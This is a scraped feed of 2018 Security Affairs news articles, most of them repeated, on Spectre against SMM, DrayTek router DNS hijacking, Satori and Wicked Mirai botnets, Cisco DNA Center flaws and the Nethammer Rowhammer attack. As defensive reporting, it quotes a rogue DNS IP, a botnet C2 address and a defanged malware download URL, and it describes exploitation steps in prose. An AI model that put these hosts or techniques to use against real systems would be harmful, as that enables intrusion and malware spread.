Eclypsium reported the new attack technique to Intel in March. Intel replied that the security updates released for the Spectre variant 1 and variant 2 should be enough to mitigate this new attack.

Pierluigi Paganini

(Security Affairs – Spectre, hacking)

The post Experts propose a new variation of the Spectre attack to recover data from System Management Mode appeared first on Security Affairs.

Security Affairs: Experts propose a new variation of the Spectre attack to recover data from System Management Mode

Researchers from Eclypsium proposed a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode.

Security experts from Eclypsium have devised a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode (SMM) (aka called ring -2).

The SMM is an operating mode of x86 CPUs in which all normal execution, including the operating system, is suspended.

When a code is sent to the SMM, the operating system is suspended and a portion of the UEFI/BIOS firmware executes various commands with elevated privileges and with access to all the data and hardware.

“The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.” reads Wikipedia.

The SMM mode was first released with the Intel 386SL in the early 90s, Intel CPUs implements a memory protection mechanism known as a range register to protect sensitive contents of memory regions such as SMM memory.

SMM memory on Intel CPUs is protected by a special type of range registers known as System Management Range Register (SMRR).

Eclypsium experts based their study on a public proof-of-concept code for the Spectre variant 1 (CVE-2017-5753) vulnerability to bypass the SMRR mechanism and access to the content of the System Management RAM (SMRAM) that contains the SMM and where the SMM working data is executed.

“Because SMM generally has privileged access to physical memory, including memory isolated from operating systems, our research demonstrates that Spectre-based attacks can reveal other secrets in memory (eg. hypervisor, operating system, or application).” states the report published by Eclypsium.

“These enhanced Spectre attacks allow an unprivileged attacker to read the contents of memory, including memory that should be protected by the range registers, such as SMM memory. This can expose SMM code and data that was intended to be confidential, revealing other SMM vulnerabilities as well as secrets stored in SMM,” 

Spectre vulnerabilities

The experts ported the PoC code to a kernel driver and demonstrated it works from the kernel privilege level. Then they run they exploit code from the kernel privilege level against protected memory.

“The kernel-level PoC exploit provides access to different hardware interfaces, which gives attackers better control over the system hardware and access to different hardware interfaces such as physical memory, IO, PCI, and MMIO interfaces. It also provides access to interfaces at a higher privilege level, such as software SMI.” explained the researchers.

“Next, we integrated the PoC exploit into CHIPSEC in order to quickly expand our tests. In our first experiment, we tried to read protected SMRAM memory. We mapped the physical addresses of SMRAM into the virtual address space and then used the SMRAM addresses as the target of our exploit.” 

The experts believe that it is possible to obtain the same result by using Spectre variant 2 (CVE-2017-5715) can also achieve the same results.

Eclypsium reported the new attack technique to Intel in March. Intel replied that the security updates released for the Spectre variant 1 and variant 2 should be enough to mitigate this new attack.

Pierluigi Paganini

(Security Affairs – Spectre, hacking)

The post Experts propose a new variation of the Spectre attack to recover data from System Management Mode appeared first on Security Affairs.



Security Affairs

Chrome evolves security indicators by marking with a red warning for HTTP content

Starting with Chrome 70, Google will mark with a red warning for HTTP content, Big G is continuing its effort to make the web more secure.

Since January 2017, Chrome indicates connection security with an icon in the address bar labeling HTTP connections to sites as non-secure, while since May 2017 Google is marking newly registered sites that serve login pages or password input fields over HTTP as not secure.

Back to the present, in May 2018 the overall encrypted traffic for several Google products is more than over 93%.

“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.

This is an important success for Google, consider that early 2014 only 50% of the traffic was encrypted.

According to the Google Transparency report, around 75% of the pages loaded via Chrome early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.

Given now plan to mark unencrypted connections with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.

Chrome 70 treatment for HTTP pages with user input

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started.” explained Emily Schechter, Product Manager, Chrome Security”

Pierluigi Paganini

(Security Affairs – Chrome 70, HTTPs)

The post Chrome evolves security indicators by marking with a red warning for HTTP content appeared first on Security Affairs.

More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit

DrayTek routers are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some models.

Routers manufactured by the Taiwan-based vendor DrayTek are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some of its routers.

DrayTek confirmed to be aware that hackers are attempting to exploit the zero-day vulnerability to compromise its routers.

Many users reported on Twitter cyber attacks against its routers, in these cases, hackers have changed DNS settings of the routers to point to a server having the 38.134.121.95 IP address on the network of China Telecom.

It is likely attackers are conducting a Man-in-the-Middle attack to redirect users to bogus clones of legitimate sites to steal their credentials.

DrayTek routers zeroday

DrayTek published a security advisory warning of the attacks and providing instructions on how to check and correct DNS settings.

“In May 2018, we became aware of new attacks against web-enabled devices, which includes DrayTek routers. The recent attacks have attempted to change DNS settings of routers.” reads the security advisory

” If you have a router supporting multiple LAN subnets, check settings for each subnet.  Your DNS settings should be either blank, set to the correct DNS server addresses from your ISP or DNS server addresses of a server which you have deliberately set (e.g. Google 8.8.8.8). A known rogue DNS server is 38.134.121.95 – if you see that, your router has been changed.  “

The company is already working on a firmware updates to patch the issue.

DrayTek published a second advisory that includes the list of devices and firmware versions that it is going to release in the coming days.

Initially, the company suspected that victims of the attacks were using DrayTek routers with default credentials, but one of them clarified that its device wasn’t using factory settings, a circumstance that confirms that attackers are in possession of a zero-day exploit.

Searching for DrayTek routers online with Shodan we can find more than 800,000 connected devices connected online, some of them could be potentially compromised with the mysterious exploit.

Pierluigi Paganini

(Security Affairs – DrayTek routers, hacking)

The post More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit appeared first on Security Affairs.

Security Affairs: More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit

DrayTek routers are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some models.

Routers manufactured by the Taiwan-based vendor DrayTek are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some of its routers.

DrayTek confirmed to be aware that hackers are attempting to exploit the zero-day vulnerability to compromise its routers.

Many users reported on Twitter cyber attacks against its routers, in these cases, hackers have changed DNS settings of the routers to point to a server having the 38.134.121.95 IP address on the network of China Telecom.

It is likely attackers are conducting a Man-in-the-Middle attack to redirect users to bogus clones of legitimate sites to steal their credentials.

DrayTek routers zeroday

DrayTek published a security advisory warning of the attacks and providing instructions on how to check and correct DNS settings.

“In May 2018, we became aware of new attacks against web-enabled devices, which includes DrayTek routers. The recent attacks have attempted to change DNS settings of routers.” reads the security advisory

” If you have a router supporting multiple LAN subnets, check settings for each subnet.  Your DNS settings should be either blank, set to the correct DNS server addresses from your ISP or DNS server addresses of a server which you have deliberately set (e.g. Google 8.8.8.8). A known rogue DNS server is 38.134.121.95 – if you see that, your router has been changed.  “

The company is already working on a firmware updates to patch the issue.

DrayTek published a second advisory that includes the list of devices and firmware versions that it is going to release in the coming days.

Initially, the company suspected that victims of the attacks were using DrayTek routers with default credentials, but one of them clarified that its device wasn’t using factory settings, a circumstance that confirms that attackers are in possession of a zero-day exploit.

Searching for DrayTek routers online with Shodan we can find more than 800,000 connected devices connected online, some of them could be potentially compromised with the mysterious exploit.

Pierluigi Paganini

(Security Affairs – DrayTek routers, hacking)

The post More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit appeared first on Security Affairs.



Security Affairs

A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market

FireEye iSIGHT Intelligence discovered on the underground market a dataset allegedly containing 200 million unique sets of personally identifiable information stolen from several popular Japanese websites.

Security experts from FireEye iSIGHT Intelligence have discovered on underground forums a dataset allegedly containing 200 million unique sets of personally identifiable information (PII) stolen from several popular Japanese website databases.

It’s likely the data was taken via opportunistic compromise.

In reality, the dataset was discovered in an instant messenger group for sharing and offering data.

The huge trove of data was first discovered in December 2017, the archive was offered by a Chinese user at around $150.

Stolen records included names, credentials, email addresses, dates of birth, phone numbers, and home addresses.

The huge archive is composed of data stolen from Japanese websites of a variety of industries, including those in the retail, transportation sectors, food and beverage, financial, and entertainment.

According to the experts, data was raked between May and June 2016, the threat actor has offered for sale site databases on Chinese underground forums since at least 2013.

“Yes, we’ve observed actors who were selling Japanese PII data or interested in purchase,” said Oleg Bondarenko, senior manager for international research at FireEye. “However [we] have never observed at such scale.”

Many users commented on the advertisement demonstrating their interest for the data, but some of them provided negative feedback because they did not receive the purchased database.

“The data was extremely varied and not available through publicly available data sources; therefore, we believe that the advertised data is genuine,” states FireEye.

Experts believe data was genuine, they noticed that most of the email addresses out of a random sample of 200,000 belong to major third-party leaks.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” continues FireEye.

Japanese websites

The analysis of another sample composed of 190,000 credentials revealed that 36% contained duplicate values and the presence of a huge numbed fake email addresses.

The seller was offering data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye concluded.

According to the officials, the scale of the data put up for sale is unprecedented for Japan.

FireEye is warning Japanese government offices and affected businesses. They say the information could be used to carry out cyberattacks on Japan.

Masatomi Iwama, an executive of FireEye’s Japan branch, explained that people must be careful about their security hygiene.

Pierluigi Paganini

(Security Affairs – Japanese websites, data leak)

The post A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market appeared first on Security Affairs.

Security Affairs: A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market

FireEye iSIGHT Intelligence discovered on the underground market a dataset allegedly containing 200 million unique sets of personally identifiable information stolen from several popular Japanese websites.

Security experts from FireEye iSIGHT Intelligence have discovered on underground forums a dataset allegedly containing 200 million unique sets of personally identifiable information (PII) stolen from several popular Japanese website databases.

It’s likely the data was taken via opportunistic compromise.

In reality, the dataset was discovered in an instant messenger group for sharing and offering data.

The huge trove of data was first discovered in December 2017, the archive was offered by a Chinese user at around $150.

Stolen records included names, credentials, email addresses, dates of birth, phone numbers, and home addresses.

The huge archive is composed of data stolen from Japanese websites of a variety of industries, including those in the retail, transportation sectors, food and beverage, financial, and entertainment.

According to the experts, data was raked between May and June 2016, the threat actor has offered for sale site databases on Chinese underground forums since at least 2013.

“Yes, we’ve observed actors who were selling Japanese PII data or interested in purchase,” said Oleg Bondarenko, senior manager for international research at FireEye. “However [we] have never observed at such scale.”

Many users commented on the advertisement demonstrating their interest for the data, but some of them provided negative feedback because they did not receive the purchased database.

“The data was extremely varied and not available through publicly available data sources; therefore, we believe that the advertised data is genuine,” states FireEye.

Experts believe data was genuine, they noticed that most of the email addresses out of a random sample of 200,000 belong to major third-party leaks.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” continues FireEye.

Japanese websites

The analysis of another sample composed of 190,000 credentials revealed that 36% contained duplicate values and the presence of a huge numbed fake email addresses.

The seller was offering data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye concluded.

According to the officials, the scale of the data put up for sale is unprecedented for Japan.

FireEye is warning Japanese government offices and affected businesses. They say the information could be used to carry out cyberattacks on Japan.

Masatomi Iwama, an executive of FireEye’s Japan branch, explained that people must be careful about their security hygiene.

Pierluigi Paganini

(Security Affairs – Japanese websites, data leak)

The post A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market appeared first on Security Affairs.



Security Affairs

Security Affairs: A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms

A New Mexico man admitted being responsible for
DDoS attacks against the websites of former employers, business competitors, and public services.

John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular ‘services of “DDoS-for-hire” companies to power DDoS attacks against its victims,  cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of the victims is long and include business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to a poor ops sec. The man sent emails to the victims while they were under DDoS attacks and proposed his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masquerading his real IP address.

stresser

The man initially rejected a plea deal, but in January he pleaded guilty to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States in the period between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was condemned to 180-month in jail and will have to compensate the victims of his DDoS attacks, the overall amount will be determined soon.

Pierluigi Paganini

(Security Affairs – distributed denial-of-service, cybercrime)

 

The post A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms appeared first on Security Affairs.



Security Affairs

A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms

A New Mexico man admitted being responsible for
DDoS attacks against the websites of former employers, business competitors, and public services.

John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular ‘services of “DDoS-for-hire” companies to power DDoS attacks against its victims,  cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of the victims is long and include business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to a poor ops sec. The man sent emails to the victims while they were under DDoS attacks and proposed his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masquerading his real IP address.

stresser

The man initially rejected a plea deal, but in January he pleaded guilty to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States in the period between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was condemned to 180-month in jail and will have to compensate the victims of his DDoS attacks, the overall amount will be determined soon.

Pierluigi Paganini

(Security Affairs – distributed denial-of-service, cybercrime)

 

The post A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms appeared first on Security Affairs.

Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software

While a new variant of the dreaded Mirai botnet, so-called Wicked Mirai, emerged in the wild the operators of the Mirai Satori botnet appear very active.

Experts observed hackers using the Satori botnet to mass-scan the Internet for exposed Ethereum mining pools, they are scanning for devices with port 3333 exposed online.

The port 3333 is a port commonly used for remote management by a large number of cryptocurrency-mining equipment.

The activities were reported by several research teams, including Qihoo 360 Netlab, SANS ISC,  and GreyNoise Intelligence.

Starting from May 11, experts are observing the spike in activity of the Satori botnet.
satori botnet activity

According to the researchers at GreyNoise, threat actors are focused on equipment running the Claymore mining software, once the attackers have found a server running this software they will push instructions to force the device to join the ‘dwarfpool’ mining pool using the ETH wallet controlled by the attackers.

The experts noticed that most of the devices involved in the mass scanning are compromised GPON routers located in Mexico.

The experts monitored five botnets using the compromised GPON routers to scan for Claymore miners, one of them is the Satori botnet that is leveraging an exploit for the attack.

Below the details of the five botnets published by Netlab 360:

  • SatoriSatori is the infamous variant of the mirai botnet.
    • We first observed this botnet coming after the GPON vulnerable devices at 2018-05-10 05:51:18, several hours before our last publish.
    • It has quickly overtakes muhstik as the No.1 player.
  • Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module
  • HajimeHajime pushed an update which adds the GPON’s exploits
  • Two Mirai variants: At least two malicious branches are actively exploiting this vulnerability to propagate mirai variants. One of them has been called omni by newskysecurity team.
  • imgay: This appears like a botnet that is under development. Its function is not finished yet.

“In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.” reads a blog post published by Netlab 360.

“From our estimate, only 2% all GPON home router is affected, most of which located in Mexico.”

“The source of this scan is about 17k independent IP addresses, mainly from Uninet SA de CV, telmex.com, located in Mexico,”

Researchers at SANS ISC that analyzed the Satori botnet activity discovered the bot is currently exploiting the CVE-2018-1000049 remote code execution flaw that affects the Nanopool Claymore Dual Miner software.

The experts observed the availability online of proof-of-concept code for the CVE-2018-1000049 vulnerability.

“The scan is consistent with a vulnerability, CVE 2018-1000049, released in February [2]. The JSON RPC remote management API does provide a function to upload “reboot.bat”, a script that can then be executed remotely. The attacker can upload and execute an arbitrary command using this feature.” reads the analysis published by the SANS ISC.

“The port the API is listening on is specified when starting the miner, but it defaults to 3333. The feature allows for a “read-only” mode by specifying a negative port, which disables the most dangerous features. There doesn’t appear to be an option to require authentication.”

Pierluigi Paganini

(Security Affairs – Satori Botnet, hacking)

The post Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software appeared first on Security Affairs.

CISCO issued security updates to address three critical flaws in Cisco DNA Center

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.

Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

The DNA Center is a network management and administration tool, experts discovered three vulnerabilities that could be exploited by remote unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center, the attacker can use them to completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote unauthenticated attacker to bypass authentication and gain a privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,”

CISCO DNA center

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out a security update to DNA Center via its System Updates tool, admins need to install the version 1.1.3 as soon as possible.

Pierluigi Paganini

(Security Affairs – Cisco DNA Center, hacking)

The post CISCO issued security updates to address three critical flaws in Cisco DNA Center appeared first on Security Affairs.

Security Affairs: CISCO issued security updates to address three critical flaws in Cisco DNA Center

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.

Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

The DNA Center is a network management and administration tool, experts discovered three vulnerabilities that could be exploited by remote unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center, the attacker can use them to completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote unauthenticated attacker to bypass authentication and gain a privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,”

CISCO DNA center

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out a security update to DNA Center via its System Updates tool, admins need to install the version 1.1.3 as soon as possible.

Pierluigi Paganini

(Security Affairs – Cisco DNA Center, hacking)

The post CISCO issued security updates to address three critical flaws in Cisco DNA Center appeared first on Security Affairs.



Security Affairs

Updated – The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.

The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including SatoriMasuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Update May 19, 2018 – Spaeaking with MalwareMustDie

I have contacted Malware Must Die for a comment on the Wicked Mirai botnet.

Below the observations he shared with me:

  • Same coder.
  • The author put all of the high-possibility exploit code in Mirai
  • GPON was seemed used on separate pwn scheme by different script outside of the Mirai, but being used to infect Mirai.

MalwareMustDie researchers told me that they passed the identity of the author to the related country LEA. They explained to me that even if they made several reports to the authorities, law enforcement failed in preventing the diffusion of the malicious code. The experts showed me official report to LEA dated back January 2018, when they alerted authorities of propagations of new Mirai variants.

“the ID of the actor was passed to the related country LEA from our team that investigated result too since we published the Satori/Okiru variant a while ago, way before ARC CPU variant was spotted.” MMD told me.

“So by the release of the OWARI, SORA, and WICKED, this is what will happen if we let the malware actor running loose unarrested. More damage will be created and they just don’t know how to stop them self.”

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post Updated – The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.

Security Affairs: The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.

The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including SatoriMasuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.



Security Affairs

Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code

Nethammer attack technique is the first truly remote Rowhammer attack that doesn’t require a single attacker-controlled line of code on the targeted system.

A few days ago security experts announced the first network-based remote Rowhammer attack, dubbed Throwhammer. The attack exploits a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.

Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically, an attacker can change any value of the bit in the memory.

The issue has been known at least since 2012, the first attack was demonstrated in 2015 by white hat hackers at Google Project Zero team.

To better understand the Rowhammer flaw, let’s remember that a DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To avoid that an application accesses the memory space reserved by another application, it implements a “sandbox” protection mechanism.

Bit flipping technique caused by the Rowhammer problems could be exploited to evade the sandbox.

A separate group of security researchers has now demonstrated another network-based remote Rowhammer attack dubbed Nethammert, that leverages uncached memory or flush instruction while processing the network requests.

Nethammer is the first truly remote Rowhammer attack, without a single attacker-controlled line of code on the targeted system. Systems that use uncached memory or flush instructions while handling network requests, e.g., for interaction with the network device, can be attacked using Nethammer” reads the research paper published by the experts.

The research team was composed of academics from the Graz University of Technology, the University of Michigan and Univ Rennes.

The Nethammer technique can be exploited by attackers to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing.

The attack is feasible only with a fast network connection between the attacker and victim.

“We demonstrate that the frequency of the cache misses is in all three cases high enough to induce bit flips. We evaluated different bit flip scenarios.” continues the paper.
“Depending on the location, the bit flip compromises either the security and integrity of the system and the data of its users, or it can leave persistent damage on the system, i.e., persistent denial of service.”

This process results in a high number of memory accesses to the same set of memory locations, which could induce disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.
Nethammer attack

Data corruption resulting from the operations can be exploited by the attackers to gain control over the victim’s system.

“To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache.” continues the attacker.
“An attacker can use the unprivileged clflush instruction to invalidate the cache line or use uncached memory if available.” 

The experts highlighted that caching makes the attack more difficult, so they devised some techniques to bypass the cache and direct access to the DRAM to cause the interference.

